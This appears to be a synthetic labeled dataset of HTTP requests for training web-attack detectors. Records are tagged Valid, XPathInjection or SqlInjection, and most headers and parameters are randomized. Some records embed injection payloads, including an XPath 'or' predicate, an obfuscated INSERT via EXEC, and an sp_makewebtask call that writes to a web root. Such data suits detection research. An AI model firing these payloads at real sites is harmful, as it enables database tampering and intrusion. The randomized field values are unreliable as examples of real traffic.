If-Range: Fri, 16 Oct 09 20:40:35 CET
Max-Forwards: 428
MIME-Version: 9.8
Pragma: inm6fhnu='oaj'
Proxy-Authorization: H6fasy hpdssh=vurise
Authorization: NTLM Y2FlYWplMnJPYWZvbmllaTJ0VG5TYXNiczNUbzF4ZXhpT3VvZ2llZ29vc0Qy
Range: -1,640-,-33570
Referer: /ria3e0e/sv5y/8L3hRaoc.avi
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.8 (Machintosh; U; PPC 6.4; zo-hy; rv:4.6.9) Gecko/17043537
UA-CPU: PowerPC
UA-Disp: 202,714,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7316x082
Via: w7tao/7.2 www.oaoe7Of.tiff
Transfer-Encoding: identity
Upgrade: tnl/8.4, hvmlz/2.3, sn2fh/0.4, tEir/3.1, eEcar/0.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 57.123.138.159
X-Serial-Number: 1816915028
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 16219
Start - Id: 6302
class: Valid
POST /oe.js? HTTP/1.1
Content-Length: 140
Content-Language: yraie
Content-Encoding: identity
Content-Location: /cs8iez/icmhz.pl
Content-MD5: MmVhU2hCcnRlZnVyb2Vmbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Aug 09 16:21:23 UTC
Last-Modified: Fri, 20 Feb 09 18:54:43 CET
Host: www.iaiesq4n.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: a-Fda;q=0.7, stnd4-rm;q=0.2, eexdeO-5lhjen7;q=0.9, he-ahaEelh
Cache-Control: no-transform
Client-ip: 99.32.69.228
Cookie: rmaO=69446940;sTCt4tXa=1353708
Cookie2: $Version="3"
Date: Wed, 03 Mar 10 17:48:21 UTC
ETag: W/"CRrlvqSg_oS8jZDr"
Expect: t19p
From: eOapi@ngtn7he.gov
If-Modified-Since: Tue, 08 Feb 05 24:14:51 GMT
If-Unmodified-Since: Wed, 14 Apr 04 13:48:30 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Feb 10 02:01:15 GMT
Max-Forwards: 101
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic ckxSdDY6MGxpaGQ=
Authorization: Basic cGVhcmUzbjg6dDRzcg==
Range: -7,85-,-56498
Referer: /iien/twIr/Psht/eetfefJ.htm
TE: trailers
Trailer: From
User-Agent: Mozilla/8.6 (Windows; U; Windows NT 4.3; ee-hn; rv:6.5.4) Gecko/44853217
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 475x5862
Via: 0.2 185.127.218.184
Transfer-Encoding: identity
Upgrade: 7nda/8.0
Warning: 623 137.176.166.196 "nmTcivtnt2saa2c" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yhetrnen=t4adgla?ndx&OZ4B@Fgftmp=5456639&toc8=4136360151&Jdohseunejev=4Cavk&q6Gi=ee&euedrteRtehirva=e2innf3vah1huyl&0rrYdiaeml7iaw=hyseO s

End - Id: 6302
Start - Id: 49922
class: XPathInjection
GET /i6AQO_s7_7qJljywyO/aepuoo/io94md@6ygEMig3h/eA9xJI_QTTYdv.jpeg?eiggidad=tmp%3EdilsNurhttps0%7CAyqtnE%7C%5Cs&teP=140&tneoet=wheilu%27+++or+++++1%3C+++nah0a%2Fg%2FmdTr%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D76%5D+++++or+%27iho%27++%3D++%27 HTTP/1.0
Host: www.s0ehrer.cz:80
Connection: lhsesim
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: 
Accept-Language: vrwii-shde, po-ai2WamD, Iooo-akdsweC
Cache-Control: min-fresh=4
Client-ip: 69.149.110.120
Cookie: lSg2ze=hrifedars;s0rE=88673994
Cookie2: $Version="455"
Date: Sun, 18 Jan 04 24:51:26 UTC
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: anuul0@opadyrcN.cz
If-Modified-Since: Sun, 04 Nov 07 11:22:48 GMT
If-Unmodified-Since: Sat, 09 Jan 10 12:25:30 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 22:25:22 GMT
Max-Forwards: 995
MIME-Version: 8.6
Pragma: dhL=eot3in
Proxy-Authorization: Basic Z0lmcnFibGE6eHJ1ZXJvb24=
Authorization: 2ahlAk eisydtns=lNj3t
Range: -3
Referer: /iozrcse/aeerlev/nnaV3.exe
TE: gzip;q=0.4,trailers
Trailer: Host
User-Agent: ihalkhs (s6aorLbHN; eSHJx0H)
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 5.1 249.51.174.127, 2.5 www.xoHhg8S.js
Transfer-Encoding: compress
Upgrade: qfe/8.0
Warning: 682 www.f0shh3eu.jpeg "tocdihgtUi" "Fri, 20 Feb 04 11:54:19 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49922
Start - Id: 35399
class: SqlInjection
GET /9yl/oumn9oTnh9/tDfwpJx0fDNJTTU@Q2.shtml?alm=tyorud&chslae=nbOnR6ofs&i1onxjzznr5=%3B+EXEC%28%27INS%27%2B%27ERT+INTO++++users+++++values%28791%2C%27mAiye%27%2C%27heln%27%29%29&letae3sEn=hh%3F&s6aie3He=eeo7bwddei8y&CVR.zv=dde+eT&77aes=siieneTls9scm&1te1qpeesaheEq=sNsid%2Benser%7Er&s3wthiwiamf=a0dotnrinnNyR&r4up0eE6Aeto=nNhm&ufaiendutcneh=t%40T9oaot8a&meie=40674916&TchomeWinsertzeS7childHe=iHqeisuall1temo HTTP/1.1
Host: 30.141.12.130
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, compress, gzip;q=0.5, compress, compress;q=0.7
Accept-Language: ervuhgmd-t;q=0.1, adVt2rI4-izBew5;q=0.3, oo-f
Cache-Control: kro='oteb'
Client-ip: 27.88.177.131
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="091"
Date: Fri, 04 Dec 09 08:04:40 GMT
ETag: "w.bssa@znOLYSv9"
Expect: mtrhAh
From: attRtlnt@3bmi3fqyko.fr
If-Modified-Since: Tue, 24 Jun 08 15:31:46 GMT
If-Unmodified-Since: Thu, 11 May 06 05:38:56 CET
If-Match: *
If-None-Match: "xRi8ZP-96e1q4YBs8jZ"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic ZTQwbmk6bmI2cmlyNQ==
Authorization: Basic aUEzb3BhcjpUZWN0M2U=
Range: 18-
Referer: http://www.leyfedo.biz/Mcpbaa/de4t1a/yiiEdpYe.zip
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/1.3 (X11; U; Linux i386 9.7; fO-dm; rv:4.8.1) Gecko/73357794
UA-CPU: Sparc
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 8.4 www.nohkter.jpg, FTP/5.7 www.roigfinm.jpg
Transfer-Encoding: compress
Upgrade: nk2i4r/2.9, ipzf/4.9
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 11.131.105.136
X-Serial-Number: 840148
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35399
Start - Id: 13896
class: Valid
GET /ucthys/suyztahKJJ/ungl/aCorehsRxee/o8QMeo3kC0/sondSlbwod/sp_e0UUx8s15@zMWy.bin?ATkZo=twindow.open%7En&edich=4FsN-_2-S&TiGyMlobjectY=2168160&ee=mwR2ck9xtn&uokeepoebarre=formweng&njo-Gi27=9028538206&oyac=724&g9sn0sJanr9ms=in%7Emd9++jtdyhnn&arsz0esxMh=81562972&is=dsrejh7uocee5ni8i&matjnjlmaiserto=patt&elnnte4ycrw=2 HTTP/1.0
Host: www.eks9.net
Connection: close
Accept: application/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: wtP-n, ehsed3-a3g;q=0.1
Cache-Control: only-if-cached
Client-ip: 158.245.114.113
Cookie: soenvoeasoteyab=ryH0phto;ukAafevs=n4Py;o8EsactmDe3=);insertcmddTzmAD=28;nooi=11571
Cookie2: $Version="6"
Date: Fri, 17 Mar 06 11:35:14 UTC
ETag: "vZfOTTbwicbYW0DedDv"
Expect: 100-continue
From: mshmtny@eieiosii.fr
If-Modified-Since: Thu, 26 May 05 12:22:36 CET
If-Unmodified-Since: Sat, 02 Jan 10 04:16:51 CET
If-Match: "pl_@_qgoMAbItrNN5"
If-None-Match: *
If-Range: *
Max-Forwards: 915
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="oa1hT"
Authorization: Basic aWlpNGE6VURvZXQ=
Range: 914-
Referer: /ep1sh.bin
TE: trailers,gzip,trailers
Trailer: Range
User-Agent: Mozilla/5.3 (compatible; Konqueror/4.8; Linux i586; ae2rkdbger)
UA-CPU: Sparc
UA-Disp: 215,5211,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7739x7906
Via: 7.8 www.titamn.gif, HTTP/1.9 www.t1ms.html, 3.0 www.tlrur.jpeg
Transfer-Encoding: ctmr7
Upgrade: ujteh/5.0, sh2/9.2, nct9Z/8.1
Warning: 289 117.168.162.177:92470 "leeeIdEeemiettoeetPe" 
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13896
Start - Id: 34634
class: Valid
POST /emAleermhtd75tbiI.htm? HTTP/1.1
Content-Length: 180
Content-Language: e
Content-Encoding: deflate
Content-Location: http://9Oxnt.be/nkurztW/ir9rOdei.swf
Content-MD5: OGhoaWFiRkVvM3lhZWNzZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Dec 07 17:43:56 CET
Last-Modified: Sat, 26 Sep 09 03:26:00 UTC
Host: 249.145.120.222
Connection: Iito
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: d2e-sl, d-w;q=0.2, 9-nssErl
Cache-Control: only-if-cached
Client-ip: 15.193.160.4
Cookie: c2t9c=0896291995;0enodegPfrcpRqrCt=tma;cX4cnTmD6G=sgz
Cookie2: $Version="82"
Date: Sun, 20 Jul 08 23:55:27 GMT
ETag: W/"sXjXuprBJw.IWUcvzYx"
Expect: 100-continue
From: ebe2@s8zmeu.com
If-Modified-Since: Sun, 20 Mar 05 18:21:59 CET
If-Unmodified-Since: Sat, 26 Apr 08 06:33:28 CET
If-Match: "WhK731wnEgrb0t5NDdx6"
If-None-Match: "HC.R@jQMU6Cw3BQD"
If-Range: Sun, 14 Dec 08 14:50:32 UTC
Max-Forwards: 717
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.x4ihPxh.ch/M14aso.sh
Authorization: NTLM dGJTZnNhb3hhd2xzdHRzRGZ5aWVsN2VydGVlaTVhZXdTbA==
Range: 55937-
Referer: http://9Uy5685.it/isi3/tpdoh/j8r5/rHaoi1i/b4yt.ace
TE: gzip
Trailer: Connection
User-Agent: Mozilla/6.8 (Windows; U; WinNT 2.1; sE-rI; rv:4.7.8) Gecko/57189926
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3397x406
Via: FTP/6.9 www.c4mokT.jpeg, 2.0 66.17.236.165
Transfer-Encoding: identity
Upgrade: udftat/1.5, tofti2/8.0, cbCoi/4.0, dnsten/6.9
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lemowhs2p7dthln=gp8sk86nqXwn&eaOrdddrasec1s=58ggRm.WqIR&xe9t5k2n=er]e&aIre4=857508&e4etm2lrl38ng=vtynsa&a4endg=h2enullm30r67Ae&wxuts4rrdetwrqu=iikrgn7TeHtynpeEe&8HSqu48r=18216375

End - Id: 34634
Start - Id: 18187
class: Valid
GET /ndVBhlSOxoGXPLHcllkT.gif?eaokul=f_9.nLGFb2ve&mg=nahtescsSn92&leopfoxArnb=mRKWMdqt&dautGac4sdn=38164&laoeeerdieta=%5C+t&e0rncOhfodshi4i=adn%26&hcnfsgdtnrs=h%7Enph-uahttpsjbr%3Co+z%288p+%5Bwbgsound&uLGibgsound5Z5=6wPr&7nono=i%246r&ugeotAlsy4h=aktoofsase4d&eod6orlegetaShn=aeol&stxnpHe3fgs=nByGz&ta=30298 HTTP/1.1
Host: www.mtanaseo8.ch
Connection: igitReae
Accept: video/*, video/*
Accept-Charset: shift_jis;q=0.5, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 135.189.25.156
Cookie: hrnaindmtn7n8it=2726181;Opgtlmheo2=oEElf2yoev9;up8Mtbw=a1cl;sfs=47;iTwlmoanvrpa=llt
Cookie2: $Version="112"
Date: Sat, 12 May 07 18:25:47 UTC
ETag: "_ngK8lLU7tEHV1IZyL"
Expect: aaonKjt5=Elnth;oIrtoa0c=y3umpou0
From: T581@xdel.gov
If-Modified-Since: Tue, 01 Mar 05 15:19:19 CET
If-Unmodified-Since: Tue, 26 Jan 10 09:36:25 CET
If-Match: "qmpBZmku_hJolHcXjGS"
If-None-Match: "x2MNnji69.3CvAzWD"
If-Range: Sun, 05 Sep 04 19:42:32 UTC
Max-Forwards: 6
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic Zkllc3dPOm5BamV1cg==
Authorization: Digest opaque="vyTzaet"
Range: 666465-916
Referer: http://www.Leimtv.net/emEly/slsqz/aotcte/vtdntuds.avi
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.8 (compatible; eodfyc; Solaris; tpcetshnr; vdt0kalt; eioaT)
UA-CPU: 68000
UA-Disp: 904,033,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3922x0648
Via: sbtnw/4.4 www.trAnofte.jpeg, 0.1 111.43.12.121, 0.6 www.TE6ntr3.shtml
Transfer-Encoding: identity
Upgrade: niyn/6.8, eeQd/9.3, hBo/1.8, pir/6.4
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 88.31.41.115
X-Serial-Number: 93769188235463446017
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18187
Start - Id: 2970
class: Valid
GET /euBZAem/auGn.aspx? HTTP/1.0
Host: 14.139.211.94:65
Connection: lVia65b
Accept: image/gif;q=0.0, video/*;q=0.9, image/*
Accept-Charset: iso-2022-kr;q=0.5, iso-8859-5;q=0.9, shift_jis;q=0.8, cp-936
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 36.249.242.235
Cookie: ebndaeetnae=nitaargcdl;_Dx3=i@IcQGjC;ef@mocha3ikLV=yla?cktonm54dem;VpTagt=cetrykttibrtp7h;guo9habndslhog=ryrrleheyH
Cookie2: $Version="1"
Date: Thu, 14 Oct 04 10:19:55 UTC
ETag: W/"gkaRWdgtR1N8TwMOaI@"
Expect: 100-continue
From: Eth9@iyo0iiiw3a.it
If-Modified-Since: Tue, 04 Sep 07 09:36:13 UTC
If-Unmodified-Since: Fri, 02 May 08 22:10:24 GMT
If-Match: "A_DWtfWsW9fD7TZcM"
If-None-Match: *
If-Range: *
Max-Forwards: 469
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: ijf5 adere02=sleimE8e
Range: 941701-436,57-,44-
Referer: /trpeenpr.nsf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: anrkrTexx/4.0
UA-CPU: StrongARM
UA-Disp: 088,2412,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8247x2505
Via: 5.5 187.152.190.86, otN/8.1 www.8altrbt.tiff, FTP/4.3 www.omsdaspj.gif:7
Transfer-Encoding: deflate
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 1920071
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2970
Start - Id: 6989
class: Valid
POST /O.gwMWiQDg-8orJ%u.php3? HTTP/1.1
Content-Length: 94
Content-Language: eeusn,c3wi
Content-Encoding: compress
Content-Location: http://jabe.de/vjjic/ctbt6ofe/bedh.nsf
Content-MD5: b3QyM2xyZXN3bGFleHJ0Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Oct 09 17:38:15 GMT
Last-Modified: Sun, 03 Aug 08 12:43:58 UTC
Host: www.tea6sdqolr.org:216
Connection: close
Accept: text/plain, video/quicktime
Accept-Charset: big5;q=0.7, iso-8859-9;q=0.9, iso-8859-4, x-mac-hebrew;q=0.0
Accept-Encoding: 
Accept-Language: rh7-6dhessi;q=0.8, dfrrnn-zt, ohitpecw-pcus, 8cYr-p;q=0.8, er7eamur-oLdrieqr
Cache-Control: no-cache
Client-ip: 202.128.51.133
Cookie: lneetwoeutsons=iei r;dslNedA=omwgets log8r7linkca9ncN;37.E_b4TAU=rgoideRderq0;F1sxltem=899
Cookie2: $Version="414"
Date: Fri, 25 Jan 08 13:21:14 UTC
ETag: W/"4HW5m1z0YPa-.Mv-dE"
Expect: CsqnR=aodtm;eo1obyp
From: souwa@lpEs.net
If-Modified-Since: Wed, 04 Mar 09 21:27:54 GMT
If-Unmodified-Since: Mon, 20 Feb 06 08:42:33 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4150
MIME-Version: 8.2
Pragma: jzs='cxoi'
Proxy-Authorization: aasa0 Tiemls=e9ea
Authorization: Basic ZXNvbjRzczp1U3I3ZDZh
Range: 544-,459-
Referer: http://liiRo.it/teeSkt/dgre/fnTcqtd.html
TE: trailers,deflate
Trailer: Host
User-Agent: nNvntt2h7se3sfbrldg
UA-CPU: 68000
UA-Disp: 4258,294,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 821x4420
Via: 2.3 www.eokli.html, tpgl/4.2 146.164.160.42, 3.3 208.19.81.159
Transfer-Encoding: compress
Upgrade: n2e/1.3
Warning: 506 www.isxea3en.htm "fCnsiousntr6A9nt" "Thu, 15 Mar 07 14:14:02 CET"
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xiageets=9485490360&ztIspa=oaU4cF_R&gOe0sd=%7Cogyuschdli+dp%26%25eei+&bMiframeformy.node%uQ=8s

End - Id: 6989
Start - Id: 21926
class: Valid
GET /ZKJE/pe/hlzxqhuE-3Vj/z-AlqIlANgkcClJe/oOULo@UTyy.html?xdIistonr=i+a9r%29%24n+ HTTP/1.0
Host: www.4dwd.ch:80
Connection: close
Accept: audio/x-wav, video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, identity, compress;q=0.9, deflate;q=0.9, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 173.173.55.126
Cookie: oSeoToo3antSrm=iEeer5tn?
Cookie2: $Version="934"
Date: Sat, 10 Apr 10 06:06:14 UTC
ETag: W/"XM6wxA4_U4sd4oar7"
Expect: 100-continue
From: eregee@ddutgEiyN.be
If-Modified-Since: Fri, 05 Jun 09 11:32:18 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:58:22 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 541
MIME-Version: 3.8
Pragma: ry6ot0mD='Fahaw'
Proxy-Authorization: Basic YXBiYTpqZW1r
Authorization: Basic NmFOaHo6YW1vbQ==
Range: 5944-,-4,93231-
Referer: http://seUGya.be/gooa.pdf
TE: trailers,chunked;q=0.6
Trailer: Referer
User-Agent: Mozilla/5.6 (X11; U; Open BSD i586 6.2; hd-rt; rv:2.4.7) Gecko/79026947
UA-CPU: x86
UA-Disp: 964,7426,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6616x2901
Via: 8.7 184.114.181.36:47389
Transfer-Encoding: gzip
Upgrade: pwsw/0.0, dpee0/5.1
Warning: 706 118.112.66.251 "faTC6" "Thu, 05 Oct 06 20:03:57 UTC"
X-Forwarded-For: 235.150.2.160
X-Serial-Number: 09176432061314
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21926
Start - Id: 48547
class: XPathInjection
POST /zEbab2t0omouPnt/is1Yngfasnh8t/ur/ijv/rc/nteorekzaOni1i/mxarerlaqyrtmttoe5a/1kWY.tiff? HTTP/1.0
Content-Length: 381
Content-Language: xn2,hsk
Content-Encoding: identity
Content-Location: /hpd5oiN/hA33/rqihfn.js
Content-MD5: ZTdPYXBpY29waHJ4ekFydA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Sep 04 10:52:23 UTC
Last-Modified: Wed, 14 Jun 06 07:40:57 CET
Host: www.slrlo3o.fr
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw, x-mac-arabic;q=0.7, iso-8859-2, x-mac-korean;q=0.0
Accept-Encoding: gzip;q=0.3, deflate, gzip, identity;q=0.7, compress;q=0.6
Accept-Language: *;q=0.3
Cache-Control: 0i9qwl=acSseene
Client-ip: 220.175.249.82
Cookie: group byxhttpsAimgR2=a;4t;YIqwZIULc=szhde4tEqe2w;1R=altuuboot.iniE't;e3m2tt=nxenAha78Foa0;5tl=2
Cookie2: $Version="4"
Date: Tue, 05 Dec 06 03:21:02 GMT
ETag: W/"9a.@kRmZK0277p2HO0wo"
Expect: wnoeeHd
From: 5lotN@aerqwne.st
If-Modified-Since: Fri, 05 Dec 08 10:19:32 GMT
If-Unmodified-Since: Mon, 09 Feb 04 24:32:05 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 750
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM dE5kYWF6dGFzZmlvdWJzQk9MbzNvZW42d3Ryc21iZXQ=
Range: -3
Referer: http://innia.it/9egee3on/nshi7/Waeate/rDlelnOd.css
TE: chunked;q=0.8,trailers
Trailer: Max-Forwards
User-Agent: pHee (dE_p4wd; 34Mmw_K9xa; otoM1j)
UA-CPU: StrongARM
UA-Disp: 8426,8051,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 429x1759
Via: 7.2 39.84.38.217, FTP/5.2 29.128.45.126, 3.7 180.221.76.228
Transfer-Encoding: compress
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

untaEeZiHt=esax&Cmewaonnp6=ir7o&eHeC=07     or  1<  dit/elo/ieM/child::text()[position()=93]  or  11='] | /* | /foo[bar='&iiruN4darog1=Msn2 ihomeeahosgl&CadminsfSdB=p58I&jie0ayt1sue=1280&Hi3hSRarieO=f2iiAeeon&rg5ds5=036&cyrtoNaxh=mp&ytrm8ijZsPe=>eim&eedea=yna5eoz&vw7een=9728266&9rbprkifma2o=r?zn>&rcpHYF=22&poouuleamzanaN=ur3Nqr

End - Id: 48547
Start - Id: 30087
class: Valid
GET /aRtwttee/cNaQb/nU3xL/o0/orBar9z6B_NU3/2Uo2PpassthruKkformoSe.js?O0K3CMmco1=477699&2gsee9i=tnaosy2rbaco&acceptc6DlsqK=sQSASkMSc&fnuvvc1m=0652 HTTP/1.0
Host: 75.99.197.149
Connection: stjhN
Accept: image/gif;q=0.4
Accept-Charset: iso-2022-jp, isiri-3342, windows-1250;q=0.1, utf-7;q=0.9
Accept-Encoding: identity;q=0.9, identity
Accept-Language: k-iteuLpn;q=0.6, HoJeLcnc-aEtaRnna;q=0.6, lr-E;q=0.9, xpeqeee-ry
Cache-Control: ueit='weac4at'
Client-ip: 18.19.225.146
Cookie: hsrdyCfle5atag=98;e1vradsR2rifI=581;se=2945853334;nN=r6w2tcres5rlwadtI;7SrUhZgroup byV=eitdtrst
Cookie2: $Version="23"
Date: Mon, 07 Jul 08 02:21:17 UTC
ETag: W/"Ocoimis9INXKn05DKM"
Expect: 100-continue
From: uaHi@yedijoahj.de
If-Modified-Since: Thu, 26 Jun 08 20:06:06 GMT
If-Unmodified-Since: Sun, 22 Jun 08 01:03:48 GMT
If-Match: "z7.c1fOi_jVUz_k2TARU"
If-None-Match: "yv8Uo-voHBjjmKQ"
If-Range: Sat, 29 Nov 08 24:51:09 UTC
Max-Forwards: 4549
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: iete7e saeS1was=ejuohF
Authorization: eusrb oaUM=teyle
Range: -551
Referer: http://ydsop9.st/t6tsf/oeh7s0c7/tdIdshYa/rn70es/rouisnle.png
TE: gzip
Trailer: Upgrade
User-Agent: dshmriu17ijaiunatwta
UA-CPU: x86
UA-Disp: 978,2584,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x0520
Via: 3.7 121.244.135.16
Transfer-Encoding: gzip
Upgrade: AajeA/4.4
Warning: 922 172.195.36.87 "f6tmena1" "Fri, 19 Dec 08 22:12:57 CET"
X-Forwarded-For: 129.252.117.122
X-Serial-Number: 37353
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30087
Start - Id: 28962
class: Valid
GET /swt/2myz1@Usscm5WfT8nAGv/ciutrudaseAeuhurlak/.9vLpRs4Nk/7IQLKzYYe.3documentlogO/inputhndApU/.nVdPbodyF8xmlw.jsp?ff=cn&nlk2s=tcvh&oera7ao=liQ3avqqk-4&drcLme7=367&ma7we9ab2es=459&aa=458&idgdnaarO=93796115&umclml=645&de5taUht=6371 HTTP/1.0
Host: www.ishi2Eua.cz
Connection: keep-alive
Accept: video/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 78.125.221.48
Cookie: 0ooe=anidid2Ronwmeil;sn=0295
Cookie2: $Version="30"
Date: Tue, 21 Sep 04 03:41:03 UTC
ETag: "AlH_ZvVv78c5KA9P@U"
Expect: 100-continue
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Sat, 19 Aug 06 24:36:41 CET
If-Unmodified-Since: Tue, 07 Aug 07 13:31:31 UTC
If-Match: "3OR6@Hkd.im3D1fauGW"
If-None-Match: *
If-Range: Wed, 13 Sep 06 06:47:53 UTC
Max-Forwards: 665
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM czFjaGFhYm1ybnRoaWFlbWVzM2F0M2lsNm5jb2VhdGxhcnBmMWdpZWI=
Authorization: Basic M29lcDpobFJlc2k=
Range: -332385,-432,1995-63
Referer: http://www.snm1eo.cz/jqolt/bgXty/ltRefe.mpg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: tAjtac/2.7.5.1.8
UA-CPU: MIPS
UA-Disp: 3550,9047,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1053x1221
Via: 1.3 5.124.72.121, 1.3 183.132.99.157, 2.2 www.rttcay.html:18
Transfer-Encoding: deflate
Upgrade: SDtt/0.6, mnhrp/9.3, edgePn/8.1
Warning: 060 221.176.165.132 "oh3respRbbacere" "Fri, 16 Mar 07 05:27:50 UTC"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 055751373307057
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28962
Start - Id: 40984
class: SqlInjection
GET /tjI2Uw0JKmbmvHM/e251.jsp?omairnebay=53&uhP=nxochildy4lnce&tekelustp=ooah9tut20E&sihagetTlahn2s=hs8&epEQtuC-=3667509&ahomRollal4Rw=etocx5&DFHUpasswdQc1.Asw=4zr&ioptncrc_hxc@G=shrCbhja9SA0&connectdropiswlocation=oa8i%3Bvr3rr&sCchildrXQ=dXF1m HTTP/1.0
Host: www.tu7rn9ni.gov:68059
Connection: 1caRt
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cookie: tbr=';   EXEC  master.dbo.sp_makewebtask     'c:\inetpub\wwwroot\fnsiil.shtml',  'SELECT    mniEvs FROM  8ltc2   WHERE   xtype=''U''';3stre6aodo=er&Dalt3:wagit;7dov=emLoel4e9hEslsieat;R4io=erhmacopy)
Cookie2: $Version="21"
Date: Sat, 04 Jun 05 20:40:39 CET
ETag: W/"4WtVXjLUOOMiNibMuY4F"
Expect: taie
If-Match: *
If-None-Match: "UetgTn2h83d45Lbx"
Max-Forwards: 0
Authorization: ccsEug 89otoneM=onto
Referer: /oakisin/ieTjoh/a42iE/est7e/iobvyTei.msf
TE: trailers
User-Agent: OaKbn2q (yoFBx-ct1; le6sUxwX)
UA-Disp: 945,632,16
Via: HTTP/5.2 www.Tcev0g.html
Transfer-Encoding: tw3tnw; eoNaeeh=inoe
